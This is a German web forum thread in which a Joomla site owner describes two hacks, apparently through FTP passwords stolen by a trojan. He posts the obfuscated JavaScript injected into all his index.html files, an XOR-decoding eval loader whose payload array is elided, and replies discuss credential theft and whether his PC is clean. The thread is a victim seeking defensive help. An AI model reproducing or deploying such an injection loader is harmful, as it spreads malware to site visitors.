Thema: gehackte Seite - dazu einige Fragen

Hallo zusammen,

leider wurde innerhalb kurzer Zeit meine Seite zweimal gehackt und über diese ein schadhafter Code verbreitet. Die Seite habe ich sofort vom Netz genommen, dann "Flottes Liste" abgearbeitet, Joomla geupdatet und einen älteren Datensatz von vor dem Angriff hochgeladen.

Wie ich festgestellt habe, hatte ich vermutlich einen Trojana auf meinem PC, der FTP Passwörter von FileZilla ausgespäht hat. Ich betreue noch eine andere Internetseite, die mit einem lokalen Programm verwaltet wird. Diese wurde zeitgleich angegriffen. Dies ganze habe ich leider erst nach dem zweiten Angriff festgestellt. Ob möglicherweise eine Sicherheitslücke in meiner Seite ist, konnte ich leider nicht genau feststellen.

Herausgefunden habe ich weiterhin, dass sämtliche index.html Dateien verändert worden sind und der unten geostete Code eingeschleust worden ist. Deswegen meine Frage: ist es sinnvoll diese index.html Dateien mit einem Schreibschutz zu versehen oder gibt es hier Probleme mit Joomla?

Den Code aus der Datei poste ich hier mal. Vielleicht kann dieser von euch 'entschlüsselt' und erläutert werden. Da blicke ich leider nicht durch.

Vielen Dank schon mal!

Code:

**********;qmux=new Array(...);ltjs=new String();wzko=52;veqd=eval;zjjb=String.fromCharCode;for(ldhy in qmux)ltjs+=zjjb(qmux[ldhy]^wzko);veqd(ltjs);;</script>

Wenn der Angreifer die FTP-Zugangsdaten hat, dann nützt auch ein Schreibschutz nichts mehr.

Hallo,

ergänze mal die Antwort von Myrtus mit einer banalen Frage, Stichwort dazu hast Du selbst gegeben:

Zitat von falkenseer

Wie ich festgestellt habe, hatte ich vermutlich einen Trojana auf meinem PC, der FTP Passwörter von FileZilla ausgespäht hat.

Du schreibst vermutlich . Wie sicher bist Du Dir, das Dein PC jetzt sauber ist?. Passwörter ändern reicht nicht, da ein Trojaner sozusagen in Echtzeit mitlogt und Deiner Passwörter sofort weitergibt.